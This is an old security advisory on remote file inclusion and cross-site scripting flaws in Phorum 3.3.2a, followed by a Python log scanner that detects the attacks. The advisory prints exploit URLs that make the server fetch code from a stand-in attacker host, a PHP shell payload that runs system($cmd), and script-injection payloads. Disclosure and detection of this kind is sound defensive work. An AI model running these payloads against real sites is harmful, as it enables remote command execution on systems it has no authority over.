21st May 2002 [SBWID-5352]
COMMAND
Phorum remote command execution
SYSTEMS AFFECTED
Phorum 3.3.2a
PROBLEM
Markus Arndt [markus-arndt@web.de] [http://skka.de] found :
1
===
After extracting the Phorum 3.3.2a archive we have lots of php files
and subfolders. I just snooped around a bit and found this file
vulnerable for remote script inclusion:
./plugin/replace/plugin.php
let's see some code:
<?php
// $PHORUM[settings_dir] can be preset from the request (register_globals),
// so the path handed to include() is attacker-controlled
include("$PHORUM[settings_dir]/replace.php");
function mod_replace_read_body ($body) {
    global $pluginreplace;
    reset($pluginreplace);
    while(list($key,$val) = each($pluginreplace)) {
        $body = str_replace($key,$val,$body);
    }
    return $body;
}
$plugins["read_body"]["mod_replace"]="mod_replace_read_body";
?>
Easy one..
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
This one will get the file http://[evilhost]/replace.php and execute
it. If [evilhost] has php enabled we could use this one as replace.php:
<?
// runs on the PHP-enabled [evilhost]; it only prints the inner script,
// which the victim then fetches as replace.php and executes
echo("<?
system(\"\$cmd\");
?>");
?>
If it's not php-enabled, simply:
<?
system("$cmd");
?>
2
===
Another bug for remote command execution. This time it's
admin/actions/del.php :)
Some code:
<?php
// $include_path is likewise taken from the request, so require loads
// delete_message.php from whatever URL the attacker supplies
require "$include_path/delete_message.php";
delete_messages($id);
QueMessage("Message(s) $id and all children were deleted!<br>");
?>
The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
That url will make the script include
http://[evilhost]/delete_message.php
3
===
CSS attacks are possible on 2 files:
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>
SOLUTION
A patch is available; upgrade to a fixed release of Phorum.
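Added detection example (not part of the original advisory or of Phorum's code): a Python scanner that reads Apache combined-format access logs and flags requests matching the three issues above. The log lines are constructed for this example and use documentation address ranges. The scanner goes beyond the two named scripts: with register_globals on, any request parameter can preset a variable that a script later hands to include(), so a remote URL in any parameter to a .php script is reported as a candidate; a sink parameter that is present but holds a local path is reported as an include override, on the assumption that no legitimate Phorum request ever sends these variables.

```python
"""Flag Phorum 3.3.2a remote-include and GLOBALS[message] XSS attempts in access logs."""
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts (relative to the Phorum root) and the request-controlled variable
# each one passes to include()/require(), as listed in the advisory.
RFI_SINKS = {
    "plugin/replace/plugin.php": "PHORUM[settings_dir]",
    "admin/actions/del.php": "include_path",
}
# Scripts that echo $GLOBALS[message] without escaping.
XSS_SINKS = {
    "admin/footer.php": "GLOBALS[message]",
    "admin/header.php": "GLOBALS[message]",
}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
HTML_INJECTION = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)

# NCSA combined format: client ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)


def _sink_for(path, table):
    """Return (script, param) when the request path ends in one of the known scripts."""
    for suffix, param in table.items():
        if path.endswith("/" + suffix):
            return suffix, param
    return None, None


def classify_request(target):
    """Classify one request target (path?query); return a finding dict or None."""
    parts = urlsplit(target)
    path = parts.path
    # parse_qsl percent-decodes names and values, so PHORUM%5Bsettings_dir%5D and
    # PHORUM[settings_dir] both arrive as the same register_globals key.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))

    script, param = _sink_for(path, RFI_SINKS)
    if script and param in params:
        value = params[param]
        kind = "rfi" if REMOTE_URL.match(value) else "include_override"
        return {"type": kind, "script": script, "param": param,
                "value": value, "cmd": params.get("cmd")}

    script, param = _sink_for(path, XSS_SINKS)
    if script and param in params and HTML_INJECTION.search(params[param]):
        return {"type": "xss", "script": script, "param": param,
                "value": params[param], "cmd": None}

    # Generalisation: any parameter carrying a remote URL to any PHP script
    # may be presetting an include path through register_globals.
    if path.endswith(".php"):
        for name, value in params.items():
            if REMOTE_URL.match(value):
                return {"type": "rfi_candidate", "script": path, "param": name,
                        "value": value, "cmd": params.get("cmd")}
    return None


def scan_log(text):
    """Run classify_request over every parsable line; attach client IP and status."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding["ip"] = m.group("ip")
            finding["status"] = int(m.group("status"))
            findings.append(finding)
    return findings


# Constructed sample log: three attempts from the advisory, two benign requests,
# and one remote-URL parameter to an unrelated script (hypothetical parameter name).
SAMPLE_LOG = """\
203.0.113.7 - - [21/May/2002:10:12:31 +0200] "GET /phorum/plugin/replace/plugin.php?PHORUM%5Bsettings_dir%5D=http://198.51.100.9&cmd=id HTTP/1.0" 200 512
203.0.113.7 - - [21/May/2002:10:13:02 +0200] "GET /phorum/admin/actions/del.php?include_path=http://198.51.100.9&cmd=ls HTTP/1.0" 200 317
203.0.113.7 - - [21/May/2002:10:14:10 +0200] "GET /phorum/admin/header.php?GLOBALS[message]=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 220
192.0.2.44 - - [21/May/2002:10:15:00 +0200] "GET /phorum/list.php?f=1 HTTP/1.0" 200 4120
192.0.2.45 - - [21/May/2002:10:16:00 +0200] "GET /phorum/admin/actions/del.php?id=42 HTTP/1.0" 302 0
203.0.113.8 - - [21/May/2002:10:17:45 +0200] "GET /phorum/index.php?page=http://198.51.100.9/x HTTP/1.0" 200 90
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['type']:16} {f['script']} {f['param']}={f['value']!r} cmd={f['cmd']}")
```

A hit of type "rfi" with a cmd parameter and a 200 status should be treated as a likely successful command execution and the web server's document root and cron/spool directories reviewed for dropped files; "include_override" and "rfi_candidate" hits are lower confidence and worth correlating with the same client address.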